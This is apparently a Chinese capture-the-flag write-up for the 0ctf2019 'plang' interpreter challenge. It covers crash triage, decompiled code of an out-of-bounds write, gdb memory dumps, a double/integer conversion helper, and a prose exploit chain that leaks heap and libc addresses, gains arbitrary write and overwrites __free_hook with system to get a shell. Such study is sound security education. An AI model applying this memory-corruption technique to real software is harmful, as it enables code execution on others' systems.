<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="n74fzVGuzCcR7QhYWu-qaPH7lKOjZC3b3tDU0egKMNA" />














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="pwn,js," />










<meta name="description" content="0ctf2019-plang题解这是一道关于js解释引擎的一道题，以前没做过类似的题，赛后在Ne0师傅写的writeup基础上自己调了一遍，记录一下调试的过程。相关的文件可以点击这里下载 基本信息将poc中的内容输入给程序，发现程序崩溃，报段错误：  新建/var/crash目录，执行下列命令：123$ vim /etc/sysctl.confkernel.core_pattern=/var/cr">
<meta name="keywords" content="pwn,js">
<meta property="og:type" content="article">
<meta property="og:title" content="0ctf2019-plang题解">
<meta property="og:url" content="https://e3pem.github.io/2019/04/27/0ctf-2019/0ctf2019-plang/index.html">
<meta property="og:site_name" content="e3pem&#39;s Blog">
<meta property="og:description" content="0ctf2019-plang题解这是一道关于js解释引擎的一道题，以前没做过类似的题，赛后在Ne0师傅写的writeup基础上自己调了一遍，记录一下调试的过程。相关的文件可以点击这里下载 基本信息将poc中的内容输入给程序，发现程序崩溃，报段错误：  新建/var/crash目录，执行下列命令：123$ vim /etc/sysctl.confkernel.core_pattern=/var/cr">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/e3pem/mdimage/master/img/20190420221817.png">
<meta property="og:image" content="https://raw.githubusercontent.com/e3pem/mdimage/master/img/20190426162402.png">
<meta property="og:updated_time" content="2019-08-07T08:44:55.240Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="0ctf2019-plang题解">
<meta name="twitter:description" content="0ctf2019-plang题解这是一道关于js解释引擎的一道题，以前没做过类似的题，赛后在Ne0师傅写的writeup基础上自己调了一遍，记录一下调试的过程。相关的文件可以点击这里下载 基本信息将poc中的内容输入给程序，发现程序崩溃，报段错误：  新建/var/crash目录，执行下列命令：123$ vim /etc/sysctl.confkernel.core_pattern=/var/cr">
<meta name="twitter:image" content="https://raw.githubusercontent.com/e3pem/mdimage/master/img/20190420221817.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://e3pem.github.io/2019/04/27/0ctf-2019/0ctf2019-plang/"/>





  <title>0ctf2019-plang题解 | e3pem's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">e3pem's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description"></h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://e3pem.github.io/2019/04/27/0ctf-2019/0ctf2019-plang/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="e3pem">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="e3pem's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">0ctf2019-plang题解</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-27T12:00:00+08:00">
                2019-04-27
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="0ctf2019-plang题解"><a href="#0ctf2019-plang题解" class="headerlink" title="0ctf2019-plang题解"></a>0ctf2019-plang题解</h1><p>这是一道关于js解释引擎的一道题，以前没做过类似的题，赛后在<a href="https://changochen.github.io/2019-03-23-0ctf-2019.html" target="_blank" rel="noopener">Ne0</a>师傅写的writeup基础上自己调了一遍，记录一下调试的过程。相关的文件可以<a href="https://github.com/e3pem/CTF/tree/master/0ctf2019/plang" target="_blank" rel="noopener">点击这里</a>下载</p>
<h2 id="基本信息"><a href="#基本信息" class="headerlink" title="基本信息"></a>基本信息</h2><p>将poc中的内容输入给程序，发现程序崩溃，报段错误：</p>
<p><img src="https://raw.githubusercontent.com/e3pem/mdimage/master/img/20190420221817.png" alt=""></p>
<p>新建/var/crash目录，执行下列命令：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ vim /etc/sysctl.conf</span><br><span class="line">kernel.core_pattern=/var/crash/%E.%p.%t.%s</span><br><span class="line">$ sysctl -p</span><br></pre></td></tr></table></figure></p>
<p>将poc作为程序的输入，程序会在<code>/var/crash</code>处产生崩溃文件。使用<code>gdb plang crashfile</code>即可查看崩溃时的内存信息</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">► <span class="number">0x5555555644a6</span>    <span class="keyword">mov</span>    <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rcx</span>], <span class="built_in">rax</span></span><br><span class="line">  <span class="number">0x5555555644a9</span>    <span class="keyword">mov</span>    <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rcx</span> + <span class="number">8</span>], <span class="built_in">rdx</span></span><br><span class="line">  <span class="number">0x5555555644ad</span>    <span class="keyword">mov</span>    <span class="built_in">rcx</span>, <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rbp</span> - <span class="number">0x20</span>]</span><br><span class="line">  <span class="number">0x5555555644b1</span>    <span class="keyword">mov</span>    <span class="built_in">rax</span>, <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rbp</span> - <span class="number">0x20</span>]</span><br><span class="line">  <span class="number">0x5555555644b5</span>    <span class="keyword">mov</span>    <span class="built_in">rdx</span>, <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rax</span> + <span class="number">0x28</span>]</span><br><span class="line">  <span class="number">0x5555555644b9</span>    <span class="keyword">mov</span>    <span class="built_in">rax</span>, <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rax</span> + <span class="number">0x20</span>]</span><br><span class="line">  <span class="number">0x5555555644bd</span>    <span class="keyword">mov</span>    <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rcx</span>], <span class="built_in">rax</span></span><br><span class="line">  <span class="number">0x5555555644c0</span>    <span class="keyword">mov</span>    <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rcx</span> + <span class="number">8</span>], <span class="built_in">rdx</span></span><br><span class="line">  <span class="number">0x5555555644c4</span>    <span class="keyword">mov</span>    <span class="built_in">eax</span>, <span class="number">1</span></span><br><span class="line">  <span class="number">0x5555555644c9</span>    <span class="keyword">leave</span>  </span><br><span class="line">  <span class="number">0x5555555644ca</span>    <span class="keyword">ret</span></span><br></pre></td></tr></table></figure>
<p>可以看到程序在<code>0x5555555644a6</code>执行时出现了错误，将rax的值赋值到rcx指向的内存处，但这是一块不合法的内存，所以导致崩溃。</p>
<p><code>0x5555555644a6-0x555555554000=0x104a6</code>，可以知道存在漏洞的地方在0x104a6处，可以在IDA中定位。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">signed</span> __int64 __<span class="function">fastcall <span class="title">vul_handler</span><span class="params">(__int64 a1, __int64 a2)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  _QWORD *addr; <span class="comment">// rcx</span></span><br><span class="line">  __int64 v4; <span class="comment">// rdx</span></span><br><span class="line">  __int64 v5; <span class="comment">// rdx</span></span><br><span class="line">  <span class="keyword">int</span> index; <span class="comment">// [rsp+14h] [rbp-Ch]</span></span><br><span class="line">  __int64 v7; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v7 = *(_QWORD *)(a2 + <span class="number">8</span>);</span><br><span class="line">  index = getIndex(a1, *(_DWORD *)(a2 + <span class="number">16</span>), *(_QWORD *)(a2 + <span class="number">24</span>), *(_DWORD *)(v7 + <span class="number">32</span>));</span><br><span class="line">  <span class="keyword">if</span> ( index == <span class="number">-1</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0L</span>L;</span><br><span class="line">  addr = (_QWORD *)(*(_QWORD *)(v7 + <span class="number">24</span>) + <span class="number">16L</span>L * index);</span><br><span class="line">  v4 = *(_QWORD *)(a2 + <span class="number">0x28</span>);</span><br><span class="line">  *addr = *(_QWORD *)(a2 + <span class="number">0x20</span>);               <span class="comment">// type</span></span><br><span class="line">  addr[<span class="number">1</span>] = v4;                                 <span class="comment">// value</span></span><br><span class="line">  v5 = *(_QWORD *)(a2 + <span class="number">0x28</span>);</span><br><span class="line">  *(_QWORD *)a2 = *(_QWORD *)(a2 + <span class="number">0x20</span>);</span><br><span class="line">  *(_QWORD *)(a2 + <span class="number">8</span>) = v5;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">1L</span>L;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>通过分析，这里存在着越界写数据的漏洞，可以<strong>往低地址溢出</strong>，但不可以往高地址溢出。</p>
<p>在把一个字符串赋值给数组时，调用的函数仍然为存在漏洞的函数，之所以失败是因为把数组下标设置为<code>-1</code>过不了程序中对下标的检查，设置成<code>-2、-3……</code>即可</p>
<p><del>变量<code>b</code>对应的地址为<code>0x5555557855e0</code>，字符串<code>a</code>所在的地址为<code>0x55555577efa0</code>，所以设置下标为<code>(0x5555557855e0-0x55555577efa0+0x20)/0x10=-0x662</code></del></p>
<h2 id="分析存储的结构体"><a href="#分析存储的结构体" class="headerlink" title="分析存储的结构体"></a>分析存储的结构体</h2><p>这里<a href="https://changochen.github.io/2019-03-23-0ctf-2019.html" target="_blank" rel="noopener">原writeup</a>给出了分析出来的结构体，主要是如下三个：</p>
<p>每一个plang的值都采用下列的结构体来存储<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">PlangObj</span>&#123;</span></span><br><span class="line">    <span class="keyword">long</span> type; <span class="comment">// if the obj is a pure double, type is 4, otherwise 5</span></span><br><span class="line">    <span class="keyword">union</span>&#123;</span><br><span class="line">        <span class="keyword">double</span> value; <span class="comment">//如果type为4，则该处已double类型存储数据</span></span><br><span class="line">        obj_ptr* obj; <span class="comment">//如果type为5，该处存储的是一个指向对象的指针</span></span><br><span class="line">    &#125;;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p>数组结构体如下：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">ArrayObj</span>&#123;</span></span><br><span class="line">    <span class="keyword">int</span> type;</span><br><span class="line">    <span class="keyword">int</span> padding;</span><br><span class="line">    <span class="keyword">void</span>* some_ptr;</span><br><span class="line">    <span class="keyword">void</span>* some_ptr2;</span><br><span class="line">    <span class="comment">// 指向对象数组的指针</span></span><br><span class="line">    PlangObj* buffer_ptr;</span><br><span class="line">    <span class="keyword">int</span> size; <span class="comment">// the buffer_ptr and size are what we care</span></span><br><span class="line">    <span class="keyword">int</span> padding2;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p>字符串结构体如下：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">StringObj</span>&#123;</span></span><br><span class="line">    <span class="keyword">int</span> type;</span><br><span class="line">    <span class="keyword">int</span> padding;</span><br><span class="line">    <span class="keyword">void</span>* some_ptr;</span><br><span class="line">    <span class="keyword">void</span>* some_ptr2;</span><br><span class="line">    <span class="keyword">int</span> some_val;</span><br><span class="line">    <span class="keyword">int</span> size;</span><br><span class="line">    <span class="comment">// 字符串的内容存储在这里</span></span><br><span class="line">    <span class="keyword">char</span>[] contents;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<h3 id="结构体验证"><a href="#结构体验证" class="headerlink" title="结构体验证"></a>结构体验证</h3><p>可以对上面的结构体进行验证，使用<code>pwngdb</code>插件可以方便的对内存数据进行搜索查看</p>
<p>数组结构体<code>var c = [1,2,3]</code>在内存中的内容如下<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">0x555555785890: 0x0000000400000003      0x0000000000000051</span><br><span class="line">0x5555557858a0: 0x0000000000000004      0x3ff0000000000000</span><br><span class="line">0x5555557858b0: 0x0000000000000004      0x4000000000000000</span><br><span class="line">0x5555557858c0: 0x0000000000000004      0x4008000000000000</span><br><span class="line">0x5555557858d0: 0x0000000000000000      0x0000000000000000</span><br><span class="line"></span><br><span class="line"><span class="comment"># 可以看到数据确实是按照double类型来存储的，对应数组中的1,2,3</span></span><br><span class="line">gdb-peda$ p&#123;double&#125;(0x5555557858a0+8)                     </span><br><span class="line"><span class="variable">$5</span> = 1</span><br><span class="line">gdb-peda$ p&#123;double&#125;(0x5555557858b0+8)</span><br><span class="line"><span class="variable">$6</span> = 2</span><br><span class="line">gdb-peda$ p&#123;double&#125;(0x5555557858c0+8)</span><br><span class="line"><span class="variable">$7</span> = 3</span><br></pre></td></tr></table></figure></p>
<p>上面的一块数据对应的是<code>ArrayObj.buffer_ptr</code>，查找该地址的引用，即可找到<code>ArrayObj</code>对应的内容：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ find 0x5555557858a0</span><br><span class="line">Searching <span class="keyword">for</span> <span class="string">'0x5555557858a0'</span> <span class="keyword">in</span>: None ranges</span><br><span class="line">Found 1 results, display max 1 items:</span><br><span class="line">[heap] : 0x555555785888 --&gt; 0x5555557858a0 --&gt; 0x4 </span><br><span class="line">gdb-peda$ x/10xg 0x555555785888-0x18</span><br><span class="line">0x555555785870: 0x0000000000000001      0x000055555577bdd0</span><br><span class="line">0x555555785880: 0x0000555555785800      0x00005555557858a0</span><br><span class="line">0x555555785890: 0x0000000400000003      0x0000000000000051</span><br><span class="line">0x5555557858a0: 0x0000000000000004      0x3ff0000000000000</span><br><span class="line">0x5555557858b0: 0x0000000000000004      0x4000000000000000</span><br></pre></td></tr></table></figure></p>
<p>可以看到其中的数据刚好和<code>ArrayObj</code>结构体相对应，<code>int</code>是四字节，<code>void *</code>为8字节。采用同样的方式可以对其他几种类型进行验证。</p>
<h2 id="泄露堆地址部分"><a href="#泄露堆地址部分" class="headerlink" title="泄露堆地址部分"></a>泄露堆地址部分</h2><p>利用数组越界写可以把一个<code>string</code>类的对象的<code>content</code>部分进行赋值，如果把它的<code>content</code>部分赋值为一个字符串对象会怎样？前8字节将被赋值为5，后8字节将被赋值为字符串对象的地址（也就是我们想要泄露的堆地址）。最后通过字符串的<code>string.byteAt_()</code>便可实现逐字节的泄露写入的堆地址。</p>
<h2 id="解决数据转换问题"><a href="#解决数据转换问题" class="headerlink" title="解决数据转换问题"></a>解决数据转换问题</h2><p>在进行任意值写的时候面临着一个问题，就是如何在double和int之间相互转换，如何将一个8字节内存从长整型转换为double型？又如何从double型转换为长整型？这里采用了c语言来实现，在exp中启动该c语言实现的程序<code>help.c</code>来帮助我们进行转换<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;signal.h&gt; </span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt; </span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt; </span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">init</span><span class="params">()</span></span>&#123;</span><br><span class="line">    setvbuf(<span class="built_in">stdin</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">    setvbuf(<span class="built_in">stdout</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">    setvbuf(<span class="built_in">stderr</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 将double类型的值转换为int类型的值</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">d2i</span><span class="params">()</span></span>&#123;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">double</span> a = <span class="number">0</span>;</span><br><span class="line">	<span class="keyword">long</span> <span class="keyword">long</span> <span class="keyword">int</span>* b = &amp;a;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">puts</span>(<span class="string">"input:"</span>);</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">"%lf"</span>,&amp;a);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%lx\n"</span>,*b);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 将int类型的值转换为double类型的值，使用g或e可以科学计数法的方式输出</span></span><br><span class="line"><span class="comment">// 其中精度可以用.后面的20来控制</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">i2d</span><span class="params">()</span></span>&#123;</span><br><span class="line">	<span class="keyword">long</span> <span class="keyword">long</span> <span class="keyword">int</span> b = <span class="number">0</span>;</span><br><span class="line">	<span class="keyword">double</span> *a = &amp;b;</span><br><span class="line">	<span class="keyword">char</span> buf[<span class="number">64</span>]=&#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">puts</span>(<span class="string">"input:"</span>);</span><br><span class="line">	read(<span class="number">0</span>,buf,<span class="number">60</span>);</span><br><span class="line">	b = atoll(buf);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%.20g\n"</span>,*a);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">	init();</span><br><span class="line">	<span class="keyword">char</span> buf[<span class="number">10</span>];</span><br><span class="line">	<span class="keyword">while</span>(<span class="number">1</span>)&#123;</span><br><span class="line">		<span class="built_in">puts</span>(<span class="string">"choice:"</span>);</span><br><span class="line">		read(<span class="number">0</span>,buf,<span class="number">2</span>);</span><br><span class="line">		<span class="keyword">if</span>(buf[<span class="number">0</span>]==<span class="string">'1'</span>)&#123;</span><br><span class="line">			d2i();</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span> <span class="keyword">if</span>(buf[<span class="number">0</span>]==<span class="string">'2'</span>)&#123;</span><br><span class="line">			i2d();</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span>&#123;</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>整数和double之间的对应关系，可以用来验证我们写的<code>helper.c</code>是否正确：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">0x00007fff006d756e--&gt;6.9531439626732071e-310</span><br><span class="line"></span><br><span class="line">0x00007ffff7ac8b78--&gt;6.9533489063778457e-310</span><br><span class="line"></span><br><span class="line">0x00007FFFF7123456--&gt;6.9533484066378559607e-310</span><br></pre></td></tr></table></figure></p>
<h2 id="泄露libc地址"><a href="#泄露libc地址" class="headerlink" title="泄露libc地址"></a>泄露libc地址</h2><p>数据的转换问题解决之后，接着便开始泄露libc的地址了，对于数组中的字段<code>buffer_ptr</code>，我们可以利用数组越界写把它修改为任意的地址（b[-0x100]=value）。前面已经得到了堆的地址，而堆中又是存在libc地址的，所以只要将<code>buffer_ptr</code>修改为某个包含libc地址的堆地址处，再调用<code>System.print(b[0])</code>即可将libc的地址输出出来</p>
<p>哪些堆地址处存在libc地址呢？使用pwngdb搜索即可</p>
<p><img src="https://raw.githubusercontent.com/e3pem/mdimage/master/img/20190426162402.png" alt=""></p>
<p>这里选取地址<code>0x5555557741b8</code>作为泄露libc地址的地方<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x/10xg 0x5555557741c3-3-8</span><br><span class="line">0x5555557741b8: 0x0000000000000004      0x00007ffff7ac8b78</span><br><span class="line">0x5555557741c8: 0x0000000000000021      0x657571655370614d</span><br><span class="line">0x5555557741d8: 0x00007fff0065636e      0x00005555557749b0</span><br><span class="line">0x5555557741e8: 0x0000000000000021      0x1101040004090008</span><br><span class="line">0x5555557741f8: 0x00003d3701371500      0x0000000000000020</span><br></pre></td></tr></table></figure></p>
<p><em>注意：要正确输出0x5555557741c0处的地址，需要把它前面的8个字节设置为0x4，表示是一个double类型，参考plang中值的存储结构体</em></p>
<p>设置指定内存的值可以通过下列方式：</p>
<blockquote>
<p>set {long long int}(0x5555557855f0+8)=0x00007ffff7ac8b78</p>
</blockquote>
<h2 id="任意地址写"><a href="#任意地址写" class="headerlink" title="任意地址写"></a>任意地址写</h2><p>和泄露libc地址一样的方式，控制数组对象的<code>buffer_ptr</code>值，将其指向我们<code>target_addr-8</code>处，便可通过<code>b[0]=value</code>的方式来达到任意地址写的目的，这里写入的时候有一个问题，就是会在目标地址的前8字节处写入<code>p64(0x4)</code>，如果这里修改了<code>__malloc_hook</code>，那么<code>__realloc_hook</code>的值将会被设置为<code>4</code>，这就导致再次赋值的时候会产生崩溃，因为<code>4</code>不是一个合法的地址</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>所以总的漏洞利用过程如下：</p>
<ol>
<li>利用数组越界写，将字符串对象赋值到字符串对象<code>a</code>的<code>content</code>处，调用<code>string.byteAt_()</code>完成heap地址泄露</li>
<li>修改<code>ArrayObj</code>结构体中的<code>buffer_ptr</code>指针，指向堆中存放libc地址的地址处，利用<code>System.print(b[0])</code>输出libc地址，完成libc地址的泄露</li>
<li>利用同样的方式修改<code>buffer_ptr</code>，利用赋值功能可以实现任意地址写，修改<code>__free_hook</code>的值为<code>system</code>地址，并修改待释放的chunk的<code>fd</code>字段内容为<code>sh</code>，调用<code>ArrayObj</code>对象的<code>clear()</code>函数触发<code>free()</code>函数的调用来getshell</li>
</ol>
